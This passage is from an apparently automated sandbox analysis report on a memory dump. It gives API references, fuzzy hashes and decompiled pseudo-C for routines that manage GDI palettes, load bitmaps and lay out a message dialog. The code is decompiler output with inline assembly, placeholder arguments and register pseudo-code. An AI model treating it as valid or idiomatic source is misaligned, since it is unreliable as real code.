RealizePalette.GDI32(?), ref: 0042D20B
SelectPalette.GDI32(?,?,00000000), ref: 0042D217
RealizePalette.GDI32(?), ref: 0042D220
SetBkColor.GDI32(?), ref: 0042D22A
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042D24E
SetBkColor.GDI32(?,00000000), ref: 0042D258
SelectObject.GDI32(?,00000000), ref: 0042D26B
DeleteObject.GDI32 ref: 0042D277
DeleteDC.GDI32(?), ref: 0042D28D
SelectObject.GDI32(?,00000000), ref: 0042D2A8
DeleteDC.GDI32(00000000), ref: 0042D2C4
ReleaseDC.USER32(00000000,00000000), ref: 0042D2D5

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: ee4438414f97e0493f9d882ccbc2aba43e5685e5aa93120b0cde5737cf5bf7c9
Instruction ID: b4d77d8e726f4fdb61d65c6fc07a9a9a301113e851f6d72de6a562f2a6715fff
Opcode Fuzzy Hash: ee4438414f97e0493f9d882ccbc2aba43e5685e5aa93120b0cde5737cf5bf7c9
Instruction Fuzzy Hash: C9513B71F04219ABEB10EBE9DC45FAEB7FCAB08704F51446AB615E7281D6789900CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043FA90, Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 454
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0043FA90(intOrPtr __eax, void* __ebx, signed char __ecx, char __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _v8;
				char _v9;
				signed int _v11;
				intOrPtr* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				int _v36;
				signed int _v40;
				int _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v61;
				char _v62;
				CHAR* _v68;
				intOrPtr* _v72;
				intOrPtr* _v76;
				intOrPtr* _v80;
				struct tagRECT _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _t203;
				int _t220;
				signed int _t224;
				void* _t228;
				CHAR* _t231;
				signed int _t240;
				signed int _t256;
				signed int _t264;
				intOrPtr* _t267;
				signed int _t296;
				signed int _t297;
				intOrPtr _t321;
				void* _t339;
				signed int _t351;
				signed int _t356;
				CHAR* _t363;
				int _t374;
				void* _t375;
				void* _t376;
				void* _t377;
				void* _t378;
				signed int _t419;
				signed int _t422;
				intOrPtr _t441;
				void* _t448;
				int _t457;
				intOrPtr* _t459;
				int _t463;
				intOrPtr* _t464;
				intOrPtr _t465;
				intOrPtr* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t481;
				void* _t485;
				void* _t490;
				void* _t491;
				void* _t500;
				void* _t506;

				_t506 = __fp0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v100 = 0;
				_v11 = __ecx;
				_v9 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t473 + 0xffffff94;
				_v16 = E0043F5B4(1, __edi);
				_t384 =  *_v16;
				 *((intOrPtr*)( *_v16 + 0x70))( *[fs:eax], 0x43ffff, _t473, __edi, __esi, __ebx, _t471);
				E00461278(_v16, 3);
				E004293D8(E00461530(_v16));
				 *((char*)(_v16 + 0x22d)) = 1;
				_t203 = _v16;
				 *((intOrPtr*)(_t203 + 0x1dc)) = _v16;
				 *((intOrPtr*)(_t203 + 0x1d8)) = E0043F644;
				E0043F3E8(E00461530(_v16),  &_v24);
				_t374 = _v24;
				_v28 = MulDiv(8, _t374, 4);
				_t463 = _v20;
				_v32 = MulDiv(8, _t463, 8);
				_t457 = MulDiv(0xa, _t374, 4);
				_v36 = MulDiv(0xa, _t463, 8);
				_v40 = MulDiv(0x32, _t374, 4);
				_t375 = 0;
				_t464 = 0x4bca88;
				_v76 = 0x4a0c8c;
				do {
					_t477 = _t375 - 0xf;
					if(_t477 <= 0) {
						asm("bt [ebp-0x7], eax");
					}
					if(_t477 < 0) {
						if( *_t464 == 0) {
							_t384 = 0;
							E0041B1E4(0, _t375, 0, 0,  &_v96, 0);
							_t356 = E004490B0(_v16);
							E0040656C( *_v76, 0,  &_v100);
							_t363 = E00404898(_v100);
							DrawTextA(E004294DC(E00461530(_v16)), _t363, 0xffffffff,  &_v96, _t356 | 0x00000420);
							 *_t464 = _v96.right - _v96.left + 8;
						}
						_t351 =  *_t464;
						if(_t351 > _v40) {
							_v40 = _t351;
						}
					}
					_t375 = _t375 + 1;
					_v76 = _v76 + 4;
					_t464 = _t464 + 4;
					_t481 = _t375 - 0xb;
				} while (_t481 != 0);
				_v44 = MulDiv(0xe, _v20, 8);
				_v48 = MulDiv(4, _v24, 4);
				_push(0);
				_t220 = E00464E70() >> 1;
				if(_t481 < 0) {
					asm("adc eax, 0x0");
				}
				SetRect( &_v96, 0, 0, _t220, ??);
				_t224 = E004490B0(_v16);
				_t228 = E00404698(_v8);
				_t231 = E00404898(_v8);
				DrawTextA(E004294DC(E00461530(_v16)), _t231, _t228 + 1,  &_v96, _t224 | 0x00000450);
				_v68 =  *((intOrPtr*)(0x4a0c4c));
				_t465 = _v96.right;
				_v52 = _v96.bottom;
				if(_v68 != 0) {
					_t465 = _t465 + _t457 + 0x20;
					if(_v52 < 0x20) {
						_v52 = 0x20;
					}
				}
				_t240 = 0;
				_t376 = 0;
				do {
					_t485 = _t376 - 0xf;
					if(_t485 <= 0) {
						asm("bt [ebp-0x7], edx");
					}
					if(_t485 < 0) {
						_t240 = _t240 + 1;
					}
					_t376 = _t376 + 1;
				} while (_t376 != 0xb);
				_t377 = 0;
				if(_t240 != 0) {
					_t377 = _v40 * _t240 + (_t240 - 1) * _v48;
				}
				E00460898(_v16, E0042F8FC(_t465, _t377) + _v28 + _v28);
				_t490 = _v52 + _v44 + _v36 + _v32 + _v32;
				E004608C8(_v16, _v52 + _v44 + _v36 + _v32 + _v32);
				_t419 = E00464E70() >> 1;
				if(_t490 < 0) {
					asm("adc edx, 0x0");
				}
				_t256 =  *(_v16 + 0x48) >> 1;
				if(_t490 < 0) {
					asm("adc eax, 0x0");
				}
				_t491 = _t419 - _t256;
				E0044648C(_v16);
				_t422 = E00464E64() >> 1;
				if(_t491 < 0) {
					asm("adc edx, 0x0");
				}
				_t264 =  *(_v16 + 0x4c) >> 1;
				if(_t491 < 0) {
					asm("adc eax, 0x0");
				}
				E004464B0(_v16, _t422 - _t264);
				if(_v9 == 4) {
					_t267 =  *0x4bb048; // 0x4bcb7c
					E00466FA0( *_t267,  &_v108);
					E00446D74(_v16, _t377, _v108, _t465);
				} else {
					E0040656C( *0x004A0C38, _t384,  &_v104);
					E00446D74(_v16, _t377, _v104, _t465);
				}
				_t493 = _v68;
				if(_v68 != 0) {
					_t459 = E0043CF14(1);
					 *((intOrPtr*)( *_t459 + 0x18))();
					 *((intOrPtr*)( *_t459 + 0x68))();
					_push(LoadIconA(0, _v68));
					_t339 = E0042B3DC( *((intOrPtr*)(_t459 + 0x168)));
					_pop(_t448);
					E0042F258(_t339, _t448);
					 *((intOrPtr*)( *_t459 + 0x84))(0x20, 0x20);
				}
				_t458 = E004387B8(_v16, 1);
				 *((intOrPtr*)(_v16 + 0x2f8)) = _t458;
				 *((intOrPtr*)( *_t458 + 0x18))();
				 *((intOrPtr*)( *_t458 + 0x68))();
				E00438C90(_t458, 1);
				E00446D74(_t458, _t377, _v8, _t465);
				E00446704(_t458,  &_v96);
				 *((intOrPtr*)( *_t458 + 0x70))();
				_v60 = _t465 - _v96.right + _v28;
				if(E00403814(_t458, _t493) != 0) {
					_v60 = E00446748(_v16) - _v60 -  *((intOrPtr*)(_t458 + 0x48));
				}
				 *((intOrPtr*)( *_t458 + 0x84))(_v96.bottom, _v96.right);
				if((_v11 & 0x00000004) == 0) {
					__eflags = _v11 & 0x00000001;
					if((_v11 & 0x00000001) == 0) {
						_v61 = 5;
					} else {
						_v61 = 0;
					}
				} else {
					_v61 = 2;
				}
				if((_v11 & 0x00000008) == 0) {
					__eflags = _v11 & 0x00000002;
					if((_v11 & 0x00000002) == 0) {
						_v62 = 2;
					} else {
						_v62 = 1;
					}
				} else {
					_v62 = 3;
				}
				_t296 = E00446748(_v16) - _t377;
				_t297 = _t296 >> 1;
				if(_t296 < 0) {
					asm("adc eax, 0x0");
				}
				_v56 = _t297;
				_t378 = 0;
				_v76 = 0x4a0c60;
				_t470 = 0x4a0c8c;
				_v80 = 0x4a0cb8;
				do {
					_t500 = _t378 - 0xf;
					if(_t500 <= 0) {
						asm("bt [ebp-0x7], eax");
					}
					if(_t500 < 0) {
						_v72 = E0043C0B0(_v16, 1, _t458, _t506);
						 *((intOrPtr*)( *_v72 + 0x18))();
						 *((intOrPtr*)( *_v72 + 0x68))();
						E0040656C( *_t470,  *_v72,  &_v112);
						E00446D74(_v72, _t378, _v112, _t470);
						 *((intOrPtr*)(_v72 + 0x214)) =  *_v80;
						_t501 = _t378 - _v61;
						if(_t378 == _v61) {
							E0043C190(_v72, 1, _t501);
						}
						if(_t378 == _v62) {
							 *((char*)(_v72 + 0x211)) = 1;
						}
						_t458 =  *_v72;
						 *((intOrPtr*)( *_v72 + 0x84))(_v44, _v40);
						_v56 = _v56 + _v40 + _v48;
						if(_t378 == 0xa) {
							_t321 = _v72;
							 *((intOrPtr*)(_t321 + 0x124)) = _v16;
							 *((intOrPtr*)(_t321 + 0x120)) = 0x43f62c;
						}
					}
					_t378 = _t378 + 1;
					_v80 = _v80 + 4;
					_t470 = _t470 + 4;
					_v76 = _v76 + 4;
				} while (_t378 != 0xb);
				_pop(_t441);
				 *[fs:eax] = _t441;
				_push(0x440006);
				return E004043FC( &_v112, 4);
			}

0x0043fa90
0x0043fa9b
0x0043fa9e
0x0043faa1
0x0043faa4
0x0043faa7
0x0043faab
0x0043faae
0x0043fabc
0x0043fad3
0x0043fae3
0x0043fae5
0x0043faed
0x0043fb00
0x0043fb08
0x0043fb0f
0x0043fb15
0x0043fb1b
0x0043fb30
0x0043fb37
0x0043fb42
0x0043fb47
0x0043fb52
0x0043fb5f
0x0043fb6b
0x0043fb78
0x0043fb7b
0x0043fb7d
0x0043fb82
0x0043fb89
0x0043fb8b
0x0043fb8d
0x0043fb92
0x0043fb92
0x0043fb96
0x0043fb9b
0x0043fba3
0x0043fba9
0x0043fbb1
0x0043fbca
0x0043fbd2
0x0043fbe6
0x0043fbf4
0x0043fbf4
0x0043fbf6
0x0043fbfb
0x0043fbfd
0x0043fbfd
0x0043fbfb
0x0043fc00
0x0043fc01
0x0043fc05
0x0043fc08
0x0043fc08
0x0043fc1e
0x0043fc2e
0x0043fc31
0x0043fc3f
0x0043fc41
0x0043fc43
0x0043fc43
0x0043fc4f
0x0043fc57
0x0043fc69
0x0043fc73
0x0043fc87
0x0043fc98
0x0043fc9b
0x0043fca1
0x0043fca8
0x0043fcad
0x0043fcb3
0x0043fcb5
0x0043fcb5
0x0043fcb3
0x0043fcbc
0x0043fcbe
0x0043fcc0
0x0043fcc2
0x0043fcc5
0x0043fcca
0x0043fcca
0x0043fcce
0x0043fcd0
0x0043fcd0
0x0043fcd1
0x0043fcd2
0x0043fcd7
0x0043fcdb
0x0043fce7
0x0043fce7
0x0043fcfe
0x0043fd11
0x0043fd16
0x0043fd29
0x0043fd2b
0x0043fd2d
0x0043fd2d
0x0043fd36
0x0043fd38
0x0043fd3a
0x0043fd3a
0x0043fd3d
0x0043fd42
0x0043fd55
0x0043fd57
0x0043fd59
0x0043fd59
0x0043fd62
0x0043fd64
0x0043fd66
0x0043fd66
0x0043fd6e
0x0043fd77
0x0043fd9d
0x0043fda4
0x0043fdaf
0x0043fd79
0x0043fd88
0x0043fd93
0x0043fd93
0x0043fdb4
0x0043fdb8
0x0043fdc9
0x0043fdd4
0x0043fdde
0x0043fdec
0x0043fdf3
0x0043fdf8
0x0043fdf9
0x0043fe0c
0x0043fe0c
0x0043fe21
0x0043fe26
0x0043fe35
0x0043fe3f
0x0043fe46
0x0043fe50
0x0043fe5a
0x0043fe69
0x0043fe72
0x0043fe82
0x0043fe92
0x0043fe92
0x0043fea7
0x0043feb1
0x0043feb9
0x0043febd
0x0043fec5
0x0043febf
0x0043febf
0x0043febf
0x0043feb3
0x0043feb3
0x0043feb3
0x0043fecd
0x0043fed5
0x0043fed9
0x0043fee1
0x0043fedb
0x0043fedb
0x0043fedb
0x0043fecf
0x0043fecf
0x0043fecf
0x0043feed
0x0043feef
0x0043fef1
0x0043fef3
0x0043fef3
0x0043fef6
0x0043fef9
0x0043fefb
0x0043ff02
0x0043ff07
0x0043ff0e
0x0043ff10
0x0043ff12
0x0043ff17
0x0043ff17
0x0043ff1b
0x0043ff30
0x0043ff3d
0x0043ff48
0x0043ff50
0x0043ff5b
0x0043ff68
0x0043ff6e
0x0043ff71
0x0043ff78
0x0043ff78
0x0043ff80
0x0043ff85
0x0043ff85
0x0043ffa3
0x0043ffa5
0x0043ffb1
0x0043ffb7
0x0043ffb9
0x0043ffbf
0x0043ffc5
0x0043ffc5
0x0043ffb7
0x0043ffcf
0x0043ffd0
0x0043ffd4
0x0043ffd7
0x0043ffdb
0x0043ffe6
0x0043ffe9
0x0043ffec
0x0043fffe

APIs

Part of subcall function 0043F5B4: SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0043F5F1
Part of subcall function 0043F5B4: CreateFontIndirectA.GDI32(?), ref: 0043F5FE

Part of subcall function 0043F3E8: GetTextExtentPointA.GDI32(00000000,00000034,00000034,?), ref: 0043F423

MulDiv.KERNEL32 ref: 0043FB3D
MulDiv.KERNEL32 ref: 0043FB4D
MulDiv.KERNEL32 ref: 0043FB5A
MulDiv.KERNEL32 ref: 0043FB66
MulDiv.KERNEL32 ref: 0043FB73
DrawTextA.USER32(00000000,00000000,000000FF,?,00000000), ref: 0043FBE6
MulDiv.KERNEL32 ref: 0043FC19
MulDiv.KERNEL32 ref: 0043FC29
SetRect.USER32 ref: 0043FC4F
DrawTextA.USER32(00000000,00000000,00000001,?,00000000), ref: 0043FC87
LoadIconA.USER32 ref: 0043FDE7

Part of subcall function 00466FA0: GetWindowTextA.USER32(?,?,00000100), ref: 00466FC3

Strings

JC, xrefs: 0043FE17
Message, xrefs: 0043FE2C
Image, xrefs: 0043FDCB
, xrefs: 0043FCB5
,eB, xrefs: 0043FB82, 0043FF02

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$Draw$CreateExtentFontIconIndirectInfoLoadParametersPointRectSystemWindow
String ID: $,eB$Image$Message$JC
API String ID: 4220236395-2965881020
Opcode ID: 460c6871ef05eacfa5a5d00163182b5520afddbd2a1bd1d043c68edda0077695
Instruction ID: 1765c426b7c94df1ba52cd6c48d941c233f242c363627cca1e50e62d628e48ba
Opcode Fuzzy Hash: 460c6871ef05eacfa5a5d00163182b5520afddbd2a1bd1d043c68edda0077695
Instruction Fuzzy Hash: BA024B75E002089FDB00EFA9C885A9DB7F5FF49308F14816AE904EB362D779AD05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042DF50, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0042DF50(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				char* _t288;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				_t288 =  &_v36;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402AE4(_v36 + 0x40c, 4, _t288);
				_v64 = _v28;
				_push(_t333);
				_push(0x42e46d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x42e440);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004035DC(1);
						if(_a4 == 0) {
							E00402FB0( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E0041F170(_v60,  *_v60, _v36 - 4, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t261 = _v64;
					E00402FB0(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E004297B4();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E0041F100(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E00429A44( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E0041F100(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E00429A64( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E00429D0C(_v32);
				}
				_v16 = E004298D4(GetDC(0));
				_push(_t333);
				_push(0x42e3bb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x4a062c == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E138(_t255, _t267, _t327, _t331);
							} else {
								E004297B4();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E0041F100(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x42e38a;
						 *[fs:eax] = _t300;
						_push(0x42e3c2);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402AE4(_t331, _t267, 0);
					_push(_t333);
					_push(0x42e323);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E0041F100(_v12, _t331, _v24);
					_v20 = E004298D4(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E00429FD0(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x42e2f7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E138(_t255, _t273, _t327, _t331);
						} else {
							E004297B4();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x42e2fe);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x0042df50
0x0042df51
0x0042df53
0x0042df5c
0x0042df5e
0x0042df61
0x0042df66
0x0042df6b
0x0042df70
0x0042df73
0x0042df80
0x0042df87
0x0042df8f
0x0042df91
0x0042df91
0x0042dfa8
0x0042dfae
0x0042dfb3
0x0042dfb4
0x0042dfb9
0x0042dfbc
0x0042dfc1
0x0042dfc2
0x0042dfc7
0x0042dfca
0x0042dfd1
0x0042e030
0x0042e033
0x0042e039
0x0042e03f
0x0042e059
0x0042e060
0x0042e06f
0x0042e074
0x0042e082
0x0042e08e
0x0042e08e
0x0042e09e
0x0042e0ae
0x0042e0c2
0x0042e0d1
0x0042e0e3
0x0042e0e9
0x0042e0e9
0x0042dfd3
0x0042dfe3
0x0042dfe6
0x0042dff2
0x0042dff7
0x0042dffd
0x0042e004
0x0042e00b
0x0042e013
0x0042e017
0x0042e017
0x0042e0ec
0x0042e0f2
0x0042e0fa
0x0042e102
0x0042e104
0x0042e104
0x0042e10d
0x0042e10f
0x0042e117
0x0042e123
0x0042e130
0x0042e135
0x0042e139
0x0042e139
0x0042e123
0x0042e117
0x0042e140
0x0042e14b
0x0042e14b
0x0042e151
0x0042e15d
0x0042e166
0x0042e178
0x0042e17e
0x0042e180
0x0042e18c
0x0042e196
0x0042e19b
0x0042e19e
0x0042e19e
0x0042e1a1
0x0042e1a6
0x0042e1a8
0x0042e1a8
0x0042e1ae
0x0042e1b3
0x0042e1b3
0x0042e1c4
0x0042e1c9
0x0042e1ca
0x0042e1cf
0x0042e1d2
0x0042e1d8
0x0042e1dd
0x0042e1eb
0x0042e341
0x0042e348
0x0042e357
0x0042e360
0x0042e359
0x0042e359
0x0042e359
0x0042e357
0x0042e367
0x0042e36d
0x0042e370
0x0042e37b
0x0042e382
0x0042e385
0x0042e3a4
0x0042e3a7
0x0042e3aa
0x0042e3ba
0x00000000
0x00000000
0x00000000
0x0042e1f1
0x0042e1f1
0x0042e1f3
0x0042e1fd
0x0042e202
0x0042e203
0x0042e208
0x0042e20b
0x0042e211
0x0042e216
0x0042e229
0x0042e243
0x0042e248
0x0042e24e
0x0042e253
0x0042e255
0x0042e261
0x0042e273
0x0042e27a
0x0042e27a
0x0042e281
0x0042e282
0x0042e287
0x0042e28a
0x0042e2a3
0x0042e2aa
0x0042e2b3
0x0042e2bc
0x0042e2b5
0x0042e2b5
0x0042e2b5
0x0042e2b3
0x0042e2c3
0x0042e2c6
0x0042e2c9
0x0042e2d2
0x0042e2de
0x0042e2de
0x0042e2f6
0x0042e2f6

APIs

GetDC.USER32(00000000), ref: 0042E1BA
CreateCompatibleDC.GDI32(00000001), ref: 0042E21F
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0042E234
SelectObject.GDI32(?,00000000), ref: 0042E23E
SelectPalette.GDI32(?,?,00000000), ref: 0042E26E
RealizePalette.GDI32(?), ref: 0042E27A
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042E29E
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042E2F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042E2AC
SelectPalette.GDI32(?,00000000,000000FF), ref: 0042E2DE
SelectObject.GDI32(?,?), ref: 0042E2EB
DeleteObject.GDI32(00000000), ref: 0042E2F1

Strings

(, xrefs: 0042E109
BM, xrefs: 0042E074

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM
API String ID: 2831685396-2980357723
Opcode ID: 9c7fe991dda08225ffdb977d68124e940ddfb53c0a0babfe655e17e302625852
Instruction ID: 191eff5a0c995ec35fd90cac0cd5daf5328e793263a3d15047b131ae248ff625
Opcode Fuzzy Hash: 9c7fe991dda08225ffdb977d68124e940ddfb53c0a0babfe655e17e302625852
Instruction Fuzzy Hash: 98D14D70B002189FDF04DFA9D885AAEBBB5EF48304F54846AF905EB395D7389841CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0046A2E8, Relevance: 23.0, APIs: 15, Instructions: 468
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0046A2E8(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				struct HDC__* _t273;
				struct HDC__* _t287;
				void* _t327;
				void* _t348;
				void* _t365;
				void* _t372;
				intOrPtr _t387;
				intOrPtr _t393;
				struct HDC__* _t397;
				struct HDC__* _t398;
				struct HDC__* _t399;
				void* _t426;
				void* _t427;
				void* _t428;
				intOrPtr _t452;
				intOrPtr _t469;
				void* _t483;
				int _t491;
				int _t496;
				void* _t498;
				void* _t500;
				intOrPtr _t501;
				void* _t511;

				_t498 = _t500;
				_t501 = _t500 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t393 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t393 != 0xffffffff) {
					L24:
					return _t393;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t508 =  *0x4a10a0;
							if( *0x4a10a0 == 0) {
								 *0x4a10a0 = E00469FE0(1);
							}
							_t387 =  *0x4a10a0; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E0046A054(_t387, _t496, _t491);
						}
						_v16 = E0042D2EC(1);
						 *[fs:eax] = _t501;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x46a897, _t498);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E0041B1E4(0, _t393, _t491, 0,  &_v44, _t496);
						E00428C64( *((intOrPtr*)(E0042D8BC(_v16) + 0x14)), _t491, 0xff00000f, _t491, _t498, _t508);
